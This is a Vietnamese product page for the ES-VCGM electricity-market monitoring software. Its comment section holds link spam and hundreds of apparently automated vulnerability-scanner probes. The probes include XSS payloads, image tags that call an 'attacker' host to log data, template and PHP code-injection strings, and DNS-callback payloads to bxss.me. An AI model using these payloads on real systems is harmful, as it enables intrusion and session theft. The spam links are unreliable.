ES-VCGM MONITORING


Là phần mềm cung cấp các chức năng nghiệp vụ để hỗ trợ tối đa cho mọi đối tượng người dùng bao gồm: Tự động cập nhật thông tin, thống kê tổng hợp số liệu, phân tích xu hướng, báo cáo thanh toán và quản trị. Bên cạnh đó ES- Monitoring đã được phát triển trên thiết bị di động nhằm tăng tính linh động trong việc cập nhật thông tin cho cán bộ quản lý.

Bình luận

Vui lòng để lại bình luận ...

m
meblzpqbof
20/05/2022 14:08
ES-VCGM (Hệ thống giám sát Thị trường điện) <a href="http://www.g8hgnu5801q390m2h5rv8xk3x9l7um57s.org/">ameblzpqbof</a> meblzpqbof http://www.g8hgnu5801q390m2h5rv8xk3x9l7um57s.org/ [url=http://www.g8hgnu5801q390m2h5rv8xk3x9l7um57s.org/]umeblzpqbof[/url]
n
nfvyvnedpf
16/05/2022 08:56
ES-VCGM (Hệ thống giám sát Thị trường điện) nfvyvnedpf http://www.gb8gjk22pk0j2p75635x220lh6dh4p1ws.org/ [url=http://www.gb8gjk22pk0j2p75635x220lh6dh4p1ws.org/]unfvyvnedpf[/url] <a href="http://www.gb8gjk22pk0j2p75635x220lh6dh4p1ws.org/">anfvyvnedpf</a>
w
wizvmdkzyq
15/05/2022 12:58
ES-VCGM (Hệ thống giám sát Thị trường điện) wizvmdkzyq http://www.ge7dg6e2m508udf4l4vow0139yty8499s.org/ [url=http://www.ge7dg6e2m508udf4l4vow0139yty8499s.org/]uwizvmdkzyq[/url] <a href="http://www.ge7dg6e2m508udf4l4vow0139yty8499s.org/">awizvmdkzyq</a>
t
twnymxndh
14/05/2022 07:05
ES-VCGM (Hệ thống giám sát Thị trường điện) twnymxndh http://www.g6806350p7hkpcifp99drg0770kfqz22s.org/ [url=http://www.g6806350p7hkpcifp99drg0770kfqz22s.org/]utwnymxndh[/url] <a href="http://www.g6806350p7hkpcifp99drg0770kfqz22s.org/">atwnymxndh</a>
r
rcqwhnkpp
11/05/2022 23:46
ES-VCGM (Hệ thống giám sát Thị trường điện) <a href="http://www.g5elm1sw067qk9n72n04v11yg9t5m70zs.org/">arcqwhnkpp</a> [url=http://www.g5elm1sw067qk9n72n04v11yg9t5m70zs.org/]urcqwhnkpp[/url] rcqwhnkpp http://www.g5elm1sw067qk9n72n04v11yg9t5m70zs.org/
p
pjlivykmkg
11/05/2022 04:34
ES-VCGM (Hệ thống giám sát Thị trường điện) pjlivykmkg http://www.g3l9i80z6p0rip83830c4dx1qr6en2y6s.org/ [url=http://www.g3l9i80z6p0rip83830c4dx1qr6en2y6s.org/]upjlivykmkg[/url] <a href="http://www.g3l9i80z6p0rip83830c4dx1qr6en2y6s.org/">apjlivykmkg</a>
p
pcbxgjfgmv
30/04/2022 06:52
ES-VCGM (Hệ thống giám sát Thị trường điện) <a href="http://www.gyz9rc69w78m3a4jtyhw888r22vi7407s.org/">apcbxgjfgmv</a> pcbxgjfgmv http://www.gyz9rc69w78m3a4jtyhw888r22vi7407s.org/ [url=http://www.gyz9rc69w78m3a4jtyhw888r22vi7407s.org/]upcbxgjfgmv[/url]
l
lvwpsgcbir
24/04/2022 06:44
ES-VCGM (Hệ thống giám sát Thị trường điện) <a href="http://www.ga228m27341dp7fijfcgo42604ki05oqs.org/">alvwpsgcbir</a> lvwpsgcbir http://www.ga228m27341dp7fijfcgo42604ki05oqs.org/ [url=http://www.ga228m27341dp7fijfcgo42604ki05oqs.org/]ulvwpsgcbir[/url]
1
1
19/04/2022 07:23
555<aJQjhAB<
1
1
19/04/2022 07:23
555<img sRc='http://attacker-9104/log.php?
1
1
19/04/2022 07:22
555<ajIGcsm x=9893>
1
1
19/04/2022 07:22
555<ifRAme sRc=9332.com></IfRamE>
1
1
19/04/2022 07:22
555<WMKUDH>NIPN0[!+!]</WMKUDH>
1
1
19/04/2022 07:21
5551GN2i <ScRiPt >BBpl(9518)</ScRiPt>
1
1<aIbccWx<
19/04/2022 07:21
555
1
1
19/04/2022 07:21
555}body{acu:Expre/**/SSion(BBpl(9398))}
1
1
19/04/2022 07:21
<a HrEF=jaVaScRiPT:>
1
1<img sRc='http://attacker-9472/log.php?
19/04/2022 07:20
555
1
1
19/04/2022 07:20
<a HrEF=http://xss.bxss.me></a>
1
1<aNlnQHV x=9515>
19/04/2022 07:20
555
1
1
19/04/2022 07:20
555<input autofocus onfocus=BBpl(9848)>
1
1<ifRAme sRc=9086.com></IfRamE>
19/04/2022 07:20
555
1
1<WU2FYI>AX0ER[!+!]</WU2FYI>
19/04/2022 07:19
555
1
1KTItj <ScRiPt >MpqP(9998)</ScRiPt>
19/04/2022 07:19
555
1
1
19/04/2022 07:18
%F6<img acu onmouseover=BBpl(92541) //%F6>
1
1}body{acu:Expre/**/SSion(MpqP(9146))}
19/04/2022 07:17
555
1
1
19/04/2022 07:17
555&lt;ScRiPt&gt;BBpl(9598)&lt;/sCripT&gt;
<
<a HrEF=jaVaScRiPT:>
19/04/2022 07:16
555
1
1
19/04/2022 07:16
555\u003CScRiPt\BBpl(9599)\u003C/sCripT\u003E
<
<a HrEF=http://xss.bxss.me></a>
19/04/2022 07:16
555
1
1<input autofocus onfocus=MpqP(9863)>
19/04/2022 07:15
555
1
1
19/04/2022 07:15
%35%35%35%3C%53%63%52%69%50%74%20%3E%42%42%70%6C%289888%29%3C%2F%73%43%72%69%70%54%3E
1
1
19/04/2022 07:15
555<img/src=">" onerror=alert(9691)>
%
%F6<img acu onmouseover=MpqP(90451) //%F6>
19/04/2022 07:14
555
1
1
19/04/2022 07:14
555<img src=xyz OnErRor=BBpl(9794)>
1
1
19/04/2022 07:14
555<img src=//xss.bxss.me/t/dot.gif onload=BBpl(9070)>
1
1&lt;ScRiPt&gt;MpqP(9137)&lt;/sCripT&gt;
19/04/2022 07:14
555
1
1
19/04/2022 07:14
555<body onload=BBpl(9413)>
1
1\u003CScRiPt\MpqP(9674)\u003C/sCripT\u003E
19/04/2022 07:14
555
%
%31%3C%53%63%52%69%50%74%20%3E%4D%70%71%50%289299%29%3C%2F%73%43%72%69%70%54%3E
19/04/2022 07:13
555
1
1
19/04/2022 07:13
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9014'>
1
1<img/src=">" onerror=alert(9324)>
19/04/2022 07:13
555
1
1<img src=xyz OnErRor=MpqP(9172)>
19/04/2022 07:13
555
1
1
19/04/2022 07:13
555<isindex type=image src=1 onerror=BBpl(9773)>
1
1<img src=//xss.bxss.me/t/dot.gif onload=MpqP(9378)>
19/04/2022 07:12
555
1
1<body onload=MpqP(9588)>
19/04/2022 07:12
555
1
1
19/04/2022 07:12
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9191></ScRiPt>
1
1
19/04/2022 07:12
555<ScRiPt >BBpl(9303)</ScRiPt>
1
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9071'>
19/04/2022 07:12
555
1
1
19/04/2022 07:11
555<ScR<ScRiPt>IpT>BBpl(9595)</sCr<ScRiPt>IpT>
1
1<isindex type=image src=1 onerror=MpqP(9074)>
19/04/2022 07:11
555
1
1
19/04/2022 07:11
555<script>BBpl(9655)</script>
1
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9760></ScRiPt>
19/04/2022 07:10
555
1
1
19/04/2022 07:10
555<WJZZER>XQ6YO[!+!]</WJZZER>
1
1
19/04/2022 07:10
555<ScRiPt >BBpl(9741)</ScRiPt>
1
1
19/04/2022 07:10
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1
19/04/2022 07:09
acx__${98991*97996}__::.x
1
1<ScRiPt >MpqP(9458)</ScRiPt>
19/04/2022 07:09
555
1
1
19/04/2022 07:09
acx[[${98991*97996}]]xca
1
1<ScR<ScRiPt>IpT>MpqP(9795)</sCr<ScRiPt>IpT>
19/04/2022 07:09
555
1
1<script>MpqP(9954)</script>
19/04/2022 07:08
555
1
1
19/04/2022 07:08
acx{{98991*97996}}xca
1
1<WACX2V>L0QIN[!+!]</WACX2V>
19/04/2022 07:08
555
1
1<ScRiPt >MpqP(9764)</ScRiPt>
19/04/2022 07:07
555
"
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
19/04/2022 07:07
555
1
1
19/04/2022 07:07
555
a
acx__${98991*97996}__::.x
19/04/2022 07:07
555
1
1
19/04/2022 07:07
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
a
acx[[${98991*97996}]]xca
19/04/2022 07:06
555
1
1
19/04/2022 07:06
555
a
acx{{98991*97996}}xca
19/04/2022 07:06
555
1
1
19/04/2022 07:06
555
1
1
19/04/2022 07:05
555<ani4Ujl<
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
19/04/2022 07:05
555
1
1
19/04/2022 07:05
<th:t="${acx}#foreach
1
1
19/04/2022 07:05
555<img sRc='http://attacker-9592/log.php?
1
1
19/04/2022 07:05
555
1
1
19/04/2022 07:05
555<aBYaOY5 x=9929>
<
<th:t="${acx}#foreach
19/04/2022 07:04
555
1
1
19/04/2022 07:04
555
1
1
19/04/2022 07:04
555<ifRAme sRc=9653.com></IfRamE>
1
1
19/04/2022 07:04
555
<
<%={{={@{#{${acx}}%>
19/04/2022 07:03
555
1
1
19/04/2022 07:02
555<W7FFFC>UUDD1[!+!]</W7FFFC>
1
1
19/04/2022 07:02
<%={{={@{#{${acx}}%>
1
1<apzLNSj<
19/04/2022 07:02
555
1
1
19/04/2022 07:02
acux6335%C0%BEz1%C0%BCz2a%90bcxuca6335
1
1<img sRc='http://attacker-9953/log.php?
19/04/2022 07:02
555
a
acux3847%C0%BEz1%C0%BCz2a%90bcxuca3847
19/04/2022 07:01
555
1
1<a23fpmj x=9296>
19/04/2022 07:01
555
1
1
19/04/2022 07:01
555jeyNh <ScRiPt >yKw5(9843)</ScRiPt>
a
acu6854<s1﹥s2ʺs3ʹuca6854
19/04/2022 07:01
555
1
1
19/04/2022 07:01
555}body{acu:Expre/**/SSion(yKw5(9491))}
1
1<ifRAme sRc=9353.com></IfRamE>
19/04/2022 07:01
555
1
19942827
19/04/2022 07:01
555
1
1
19/04/2022 07:01
<a HrEF=jaVaScRiPT:>
1
1
19/04/2022 07:00
acu1138<s1﹥s2ʺs3ʹuca1138
1
1
19/04/2022 07:00
<a HrEF=http://xss.bxss.me></a>
1
1<WXDKQS>VWLS1[!+!]</WXDKQS>
19/04/2022 07:00
555
1
1
19/04/2022 07:00
555<input autofocus onfocus=yKw5(9124)>
1
1
19/04/2022 07:00
5559660375
'
'"()&%<acx><ScRiPt >MpqP(9253)</ScRiPt>
19/04/2022 07:00
555
1
1
19/04/2022 07:00
'"()&%<acx><ScRiPt >BBpl(9555)</ScRiPt>
1
1sqId6 <ScRiPt >cuIU(9255)</ScRiPt>
19/04/2022 07:00
555
1
1
19/04/2022 06:59
555'"()&%<acx><ScRiPt >BBpl(9384)</ScRiPt>
1
1'"()&%<acx><ScRiPt >MpqP(9848)</ScRiPt>
19/04/2022 06:59
555
1
1}body{acu:Expre/**/SSion(cuIU(9988))}
19/04/2022 06:59
555
1
1
19/04/2022 06:59
%F6<img acu onmouseover=yKw5(91371) //%F6>
<
<a HrEF=jaVaScRiPT:>
19/04/2022 06:59
555
1
1
19/04/2022 06:59
555&lt;ScRiPt&gt;yKw5(9061)&lt;/sCripT&gt;
<
<a HrEF=http://xss.bxss.me></a>
19/04/2022 06:58
555
1
1
19/04/2022 06:58
555\u003CScRiPt\yKw5(9456)\u003C/sCripT\u003E
1
1<input autofocus onfocus=cuIU(9929)>
19/04/2022 06:58
555
1
1
19/04/2022 06:58
%35%35%35%3C%53%63%52%69%50%74%20%3E%79%4B%77%35%289049%29%3C%2F%73%43%72%69%70%54%3E
%
%F6<img acu onmouseover=cuIU(96891) //%F6>
19/04/2022 06:58
555
1
1
19/04/2022 06:57
555<img/src=">" onerror=alert(9800)>
1
1&lt;ScRiPt&gt;cuIU(9153)&lt;/sCripT&gt;
19/04/2022 06:57
555
1
1
19/04/2022 06:57
555<img src=xyz OnErRor=yKw5(9058)>
1
1\u003CScRiPt\cuIU(9885)\u003C/sCripT\u003E
19/04/2022 06:57
555
1
1
19/04/2022 06:57
555<img src=//xss.bxss.me/t/dot.gif onload=yKw5(9411)>
%
%31%3C%53%63%52%69%50%74%20%3E%63%75%49%55%289423%29%3C%2F%73%43%72%69%70%54%3E
19/04/2022 06:56
555
1
1
19/04/2022 06:56
555<body onload=yKw5(9694)>
1
1<img/src=">" onerror=alert(9877)>
19/04/2022 06:56
555
1
1
19/04/2022 06:56
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9222'>
1
1<img src=xyz OnErRor=cuIU(9760)>
19/04/2022 06:55
555
1
1
19/04/2022 06:55
555<isindex type=image src=1 onerror=yKw5(9757)>
1
1<img src=//xss.bxss.me/t/dot.gif onload=cuIU(9396)>
19/04/2022 06:55
555
1
1<body onload=cuIU(9344)>
19/04/2022 06:55
555
1
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9518'>
19/04/2022 06:55
555
1
1<isindex type=image src=1 onerror=cuIU(9877)>
19/04/2022 06:54
555
1
1
19/04/2022 06:54
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9819></ScRiPt>
1
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9511></ScRiPt>
19/04/2022 06:54
555
1
1<ScRiPt >cuIU(9408)</ScRiPt>
19/04/2022 06:53
555
1
1
19/04/2022 06:53
555<ScRiPt >yKw5(9339)</ScRiPt>
1
1<ScR<ScRiPt>IpT>cuIU(9843)</sCr<ScRiPt>IpT>
19/04/2022 06:53
555
1
1
19/04/2022 06:53
555<ScR<ScRiPt>IpT>yKw5(9636)</sCr<ScRiPt>IpT>
1
1<script>cuIU(9846)</script>
19/04/2022 06:53
555
1
1
19/04/2022 06:52
555<script>yKw5(9524)</script>
1
1<WOJXMQ>3YLWT[!+!]</WOJXMQ>
19/04/2022 06:52
555
1
1
19/04/2022 06:52
555<W6PTJD>IVISP[!+!]</W6PTJD>
1
1<ScRiPt >cuIU(9889)</ScRiPt>
19/04/2022 06:52
555
1
1
19/04/2022 06:52
555<ScRiPt >yKw5(9167)</ScRiPt>
"
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
19/04/2022 06:52
555
1
1
19/04/2022 06:51
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
a
acx__${98991*97996}__::.x
19/04/2022 06:51
555
1
1
19/04/2022 06:51
acx__${98991*97996}__::.x
a
acx[[${98991*97996}]]xca
19/04/2022 06:51
555
1
1
19/04/2022 06:51
acx[[${98991*97996}]]xca
a
acx{{98991*97996}}xca
19/04/2022 06:50
555
1
1
19/04/2022 06:50
acx{{98991*97996}}xca
1
1
19/04/2022 06:50
555
1
1
19/04/2022 06:50
555
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
19/04/2022 06:50
555
1
1
19/04/2022 06:49
555
1
1
19/04/2022 06:49
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
<
<th:t="${acx}#foreach
19/04/2022 06:49
555
1
1
19/04/2022 06:48
555
1
1
19/04/2022 06:48
555
1
1
19/04/2022 06:48
<th:t="${acx}#foreach
<
<%={{={@{#{${acx}}%>
19/04/2022 06:47
555
1
1
19/04/2022 06:47
555
a
acux3724%C0%BEz1%C0%BCz2a%90bcxuca3724
19/04/2022 06:47
555
1
1
19/04/2022 06:47
<%={{={@{#{${acx}}%>
1
1
19/04/2022 06:46
acux9463%C0%BEz1%C0%BCz2a%90bcxuca9463
1
1
19/04/2022 06:46
acu5458<s1﹥s2ʺs3ʹuca5458
1
1
19/04/2022 06:46
5559090290
a
acu9612<s1﹥s2ʺs3ʹuca9612
19/04/2022 06:45
555
1
1
19/04/2022 06:45
'"()&%<acx><ScRiPt >yKw5(9747)</ScRiPt>
1
19762755
19/04/2022 06:45
555
'
'"()&%<acx><ScRiPt >cuIU(9840)</ScRiPt>
19/04/2022 06:45
555
1
1
19/04/2022 06:44
555'"()&%<acx><ScRiPt >yKw5(9386)</ScRiPt>
1
1'"()&%<acx><ScRiPt >cuIU(9019)</ScRiPt>
19/04/2022 06:44
555
1
1
19/04/2022 05:18
555
1
1
19/04/2022 05:18
555
1
1
19/04/2022 05:18
555
1
1
19/04/2022 03:25
555<abBL2pl<
1
1
19/04/2022 03:25
555<img sRc='http://attacker-9262/log.php?
1
1
19/04/2022 03:24
555<aFeG3I0 x=9649>
1
1
19/04/2022 03:24
555<ifRAme sRc=9457.com></IfRamE>
1
1
19/04/2022 03:24
555<W7IDXM>V8XEK[!+!]</W7IDXM>
1
1
19/04/2022 03:24
5552ayo0 <ScRiPt >T7VJ(9785)</ScRiPt>
1
1
19/04/2022 03:23
555}body{acu:Expre/**/SSion(T7VJ(9446))}
1
1
19/04/2022 03:23
<a HrEF=jaVaScRiPT:>
1
1
19/04/2022 03:23
<a HrEF=http://xss.bxss.me></a>
1
1
19/04/2022 03:23
555<input autofocus onfocus=T7VJ(9205)>
1
1
19/04/2022 03:23
%F6<img acu onmouseover=T7VJ(97121) //%F6>
1
1
19/04/2022 03:23
555&lt;ScRiPt&gt;T7VJ(9548)&lt;/sCripT&gt;
1
1
19/04/2022 03:22
555\u003CScRiPt\T7VJ(9572)\u003C/sCripT\u003E
1
1
19/04/2022 03:22
%35%35%35%3C%53%63%52%69%50%74%20%3E%54%37%56%4A%289630%29%3C%2F%73%43%72%69%70%54%3E
1
1
19/04/2022 03:22
555<img/src=">" onerror=alert(9594)>
1
1
19/04/2022 03:22
555<img src=xyz OnErRor=T7VJ(9897)>
1
1
19/04/2022 03:21
555<img src=//xss.bxss.me/t/dot.gif onload=T7VJ(9517)>
1
1
19/04/2022 03:21
555<body onload=T7VJ(9664)>
1
1
19/04/2022 03:21
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9142'>
1
1
19/04/2022 03:21
555<isindex type=image src=1 onerror=T7VJ(9977)>
1
1
19/04/2022 03:20
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9113></ScRiPt>
1
1
19/04/2022 03:20
555<ScRiPt >T7VJ(9335)</ScRiPt>
1
1
19/04/2022 03:20
555<ScR<ScRiPt>IpT>T7VJ(9770)</sCr<ScRiPt>IpT>
1
1
19/04/2022 03:19
555<script>T7VJ(9772)</script>
1
1
19/04/2022 03:19
555<WIJ7QC>5LGOU[!+!]</WIJ7QC>
1
1
19/04/2022 03:18
555<ScRiPt >T7VJ(9523)</ScRiPt>
1
1
19/04/2022 03:17
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1
19/04/2022 03:17
acx__${98991*97996}__::.x
1
1
19/04/2022 03:15
acx[[${98991*97996}]]xca
1
1
19/04/2022 03:14
acx{{98991*97996}}xca
1
1
19/04/2022 03:14
555<aJ6AjZ2<
1
1
19/04/2022 03:13
555
1
1
19/04/2022 03:12
555<script>370A(9491)</script>
1
1
19/04/2022 03:12
555<img sRc='http://attacker-9553/log.php?
1
1
19/04/2022 03:12
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
1
1
19/04/2022 03:11
555<aRTa77v x=9252>
1
1
19/04/2022 03:11
555<ifRAme sRc=9201.com></IfRamE>
1
1
19/04/2022 03:11
555<WO41CB>PEO5N[!+!]</WO41CB>
1
1
19/04/2022 03:11
555<WTWCMB>IFZHO[!+!]</WTWCMB>
1
1
19/04/2022 03:11
555
1
1
19/04/2022 03:10
555<ScRiPt >370A(9919)</ScRiPt>
1
1
19/04/2022 03:10
<th:t="${acx}#foreach
1
1
19/04/2022 03:10
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1
1
19/04/2022 03:10
555Ojkmk <ScRiPt >Capq(9735)</ScRiPt>
1
1
19/04/2022 03:10
555
1
1
19/04/2022 03:10
acx__${98991*97996}__::.x
1
1
19/04/2022 03:10
<%={{={@{#{${acx}}%>
1
1
19/04/2022 03:10
acx[[${98991*97996}]]xca
1
1
19/04/2022 03:09
acx{{98991*97996}}xca
1
1
19/04/2022 03:08
555
1
1
19/04/2022 03:08
acux8908%C0%BEz1%C0%BCz2a%90bcxuca8908
1
1
19/04/2022 03:08
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
1
1
19/04/2022 03:08
555}body{acu:Expre/**/SSion(Capq(9782))}
1
1
19/04/2022 03:07
acu5299<s1﹥s2ʺs3ʹuca5299
1
1
19/04/2022 03:07
555
1
1
19/04/2022 03:07
<th:t="${acx}#foreach
1
1
19/04/2022 03:07
555
1
1
19/04/2022 03:07
<a HrEF=jaVaScRiPT:>
1
1
19/04/2022 03:07
5559853591
1
1
19/04/2022 03:06
<%={{={@{#{${acx}}%>
1
1
19/04/2022 03:06
acux10525%C0%BEz1%C0%BCz2a%90bcxuca10525
1
1
19/04/2022 03:06
'"()&%<acx><ScRiPt >T7VJ(9254)</ScRiPt>
1
1
19/04/2022 03:05
555'"()&%<acx><ScRiPt >T7VJ(9171)</ScRiPt>
1
1
19/04/2022 03:05
acu3827<s1﹥s2ʺs3ʹuca3827
1
1
19/04/2022 03:04
<a HrEF=http://xss.bxss.me></a>
1
1
19/04/2022 03:04
5559815403
1
1<body onload=T7VJ(9445)>
19/04/2022 03:04
555
1
1
19/04/2022 03:04
'"()&%<acx><ScRiPt >370A(9284)</ScRiPt>
1
1
19/04/2022 03:04
555<input autofocus onfocus=Capq(9959)>
1
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9336'>
19/04/2022 03:03
555
1
1<isindex type=image src=1 onerror=T7VJ(9391)>
19/04/2022 03:03
555
1
1
19/04/2022 03:03
555'"()&%<acx><ScRiPt >370A(9659)</ScRiPt>
1
1
19/04/2022 03:03
%F6<img acu onmouseover=Capq(90651) //%F6>
1
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9432></ScRiPt>
19/04/2022 03:02
555
1
1
19/04/2022 03:02
555&lt;ScRiPt&gt;Capq(9778)&lt;/sCripT&gt;
1
1<body onload=370A(9410)>
19/04/2022 03:02
555
1
1<ScRiPt >T7VJ(9006)</ScRiPt>
19/04/2022 03:01
555
1
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9679'>
19/04/2022 03:01
555
1
1
19/04/2022 03:01
555\u003CScRiPt\Capq(9502)\u003C/sCripT\u003E
1
1
19/04/2022 03:01
%35%35%35%3C%53%63%52%69%50%74%20%3E%43%61%70%71%289374%29%3C%2F%73%43%72%69%70%54%3E
1
1<ScR<ScRiPt>IpT>T7VJ(9593)</sCr<ScRiPt>IpT>
19/04/2022 03:01
555
1
1<isindex type=image src=1 onerror=370A(9618)>
19/04/2022 03:00
555
1
1
19/04/2022 03:00
555<img/src=">" onerror=alert(9148)>
1
1<aQNPBbA<
19/04/2022 02:59
555
1
1<script>T7VJ(9435)</script>
19/04/2022 02:59
555
1
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9134></ScRiPt>
19/04/2022 02:59
555
1
1<img sRc='http://attacker-9350/log.php?
19/04/2022 02:59
555
1
1<WEEAYB>L4QRU[!+!]</WEEAYB>
19/04/2022 02:59
555
1
1<ScRiPt >T7VJ(9958)</ScRiPt>
19/04/2022 02:58
555
1
1<aWiYIHS x=9112>
19/04/2022 02:58
555
1
1<ScRiPt >370A(9703)</ScRiPt>
19/04/2022 02:58
555
1
1
19/04/2022 02:58
555<img src=xyz OnErRor=Capq(9725)>
"
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
19/04/2022 02:58
555
a
acx__${98991*97996}__::.x
19/04/2022 02:58
555
a
acx[[${98991*97996}]]xca
19/04/2022 02:57
555
1
1<ScR<ScRiPt>IpT>370A(9451)</sCr<ScRiPt>IpT>
19/04/2022 02:57
555
a
acx{{98991*97996}}xca
19/04/2022 02:57
555
1
1<ifRAme sRc=9170.com></IfRamE>
19/04/2022 02:57
555
1
1
19/04/2022 02:57
555
1
1
19/04/2022 02:57
555<img src=//xss.bxss.me/t/dot.gif onload=Capq(9729)>
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
19/04/2022 02:57
555
1
1
19/04/2022 02:57
555
1
1
19/04/2022 02:57
555<body onload=Capq(9927)>
<
<th:t="${acx}#foreach
19/04/2022 02:56
555
1
1<script>370A(9694)</script>
19/04/2022 02:56
555
1
1<WJMWVT>PVFAN[!+!]</WJMWVT>
19/04/2022 02:56
555
1
1
19/04/2022 02:56
555
1
1<WXFLBK>DQCPL[!+!]</WXFLBK>
19/04/2022 02:56
555
1
1
19/04/2022 02:56
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9628'>
<
<%={{={@{#{${acx}}%>
19/04/2022 02:56
555
a
acux3471%C0%BEz1%C0%BCz2a%90bcxuca3471
19/04/2022 02:56
555
1
1
19/04/2022 02:55
555<isindex type=image src=1 onerror=Capq(9942)>
a
acu3183<s1﹥s2ʺs3ʹuca3183
19/04/2022 02:55
555
1
1UekMo <ScRiPt >gesS(9535)</ScRiPt>
19/04/2022 02:55
555
1
19086961
19/04/2022 02:55
555
1
1<ScRiPt >370A(9714)</ScRiPt>
19/04/2022 02:55
555
'
'"()&%<acx><ScRiPt >T7VJ(9388)</ScRiPt>
19/04/2022 02:55
555
1
1
19/04/2022 02:55
555&n953808=v934812
1
1'"()&%<acx><ScRiPt >T7VJ(9384)</ScRiPt>
19/04/2022 02:55
555
1
1
19/04/2022 02:55
<!--
1
1
19/04/2022 02:55
'"
<
<!--
19/04/2022 02:55
555
'
'"
19/04/2022 02:55
555
1
1
19/04/2022 02:55
/xfs.bxss.me
/
/xfs.bxss.me
19/04/2022 02:55
555
1
1
19/04/2022 02:55
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
19/04/2022 02:55
555
1
1
19/04/2022 02:55
comment/.
1
1
19/04/2022 02:55
comment
c
comment/.
19/04/2022 02:55
555
c
comment
19/04/2022 02:55
555
1
1
19/04/2022 02:55
'+'A'.concat(70-3).concat(22*4).concat(104).concat(85).concat(115).concat(85)+(require'socket' Socket.gethostbyname('hitnh'+'dxwwznhxe9bc4.bxss.me.')[3].to_s)+'
1
1
19/04/2022 02:55
"+"A".concat(70-3).concat(22*4).concat(116).concat(73).concat(114).concat(87)+(require"socket" Socket.gethostbyname("hitks"+"srlhoycy21969.bxss.me.")[3].to_s)+"
1
1
19/04/2022 02:55
bxss.me/t/xss.html?%00
1
1
19/04/2022 02:55
HttP://bxss.me/t/xss.html?%00
b
bxss.me/t/xss.html?%00
19/04/2022 02:55
555
H
HttP://bxss.me/t/xss.html?%00
19/04/2022 02:55
555
1
1
19/04/2022 02:55
'.print(md5(31337)).'
1
1
19/04/2022 02:55
${@print(md5(31337))}\
1
1
19/04/2022 02:55
${@print(md5(31337))}
1
1
19/04/2022 02:55
";print(md5(31337));$a="
1
1
19/04/2022 02:55
';print(md5(31337));$a='
1
1
19/04/2022 02:55
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
'
'.print(md5(31337)).'
19/04/2022 02:54
555
$
${@print(md5(31337))}\
19/04/2022 02:54
555
$
${@print(md5(31337))}
19/04/2022 02:54
555
"
";print(md5(31337));$a="
19/04/2022 02:54
555
'
';print(md5(31337));$a='
19/04/2022 02:54
555
;
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
19/04/2022 02:54
555
1
1
19/04/2022 02:54
".gethostbyname(lc("hitex"."vvgklkec3f322.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(78).chr(116).chr(80)."
1
1
19/04/2022 02:54
'.gethostbyname(lc('hityx'.'iiqkquxud394c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(71).chr(98).chr(79).'
"
".gethostbyname(lc("hittj"."tdvlazaa481d9.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(69).chr(122).chr(68)."
19/04/2022 02:54
555
'
'.gethostbyname(lc('hitoi'.'bumcinic26460.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(72).chr(100).chr(81).'
19/04/2022 02:54
555
1
1
19/04/2022 02:54
555
1
1
19/04/2022 02:54
'"()
'
'"()
19/04/2022 02:54
555
Ẩn danh
19/04/2022 02:54
555
1
1
19/04/2022 02:54
^(#$!@#$)(()))******
1
1
19/04/2022 02:54
!(()&&!|*|*|
1
1
19/04/2022 02:54
)
^
^(#$!@#$)(()))******
19/04/2022 02:54
555
!
!(()&&!|*|*|
19/04/2022 02:54
555
)
)
19/04/2022 02:54
555
1
1
19/04/2022 02:54
bxss.me
1
1
19/04/2022 02:54
http://bxss.me/t/fit.txt?.jpg
1
1
19/04/2022 02:54
Http://bxss.me/t/fit.txt
1
1
19/04/2022 02:54
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
b
bxss.me
19/04/2022 02:54
555
h
http://bxss.me/t/fit.txt?.jpg
19/04/2022 02:54
555
H
Http://bxss.me/t/fit.txt
19/04/2022 02:54
555
1
1&n984606=v963976
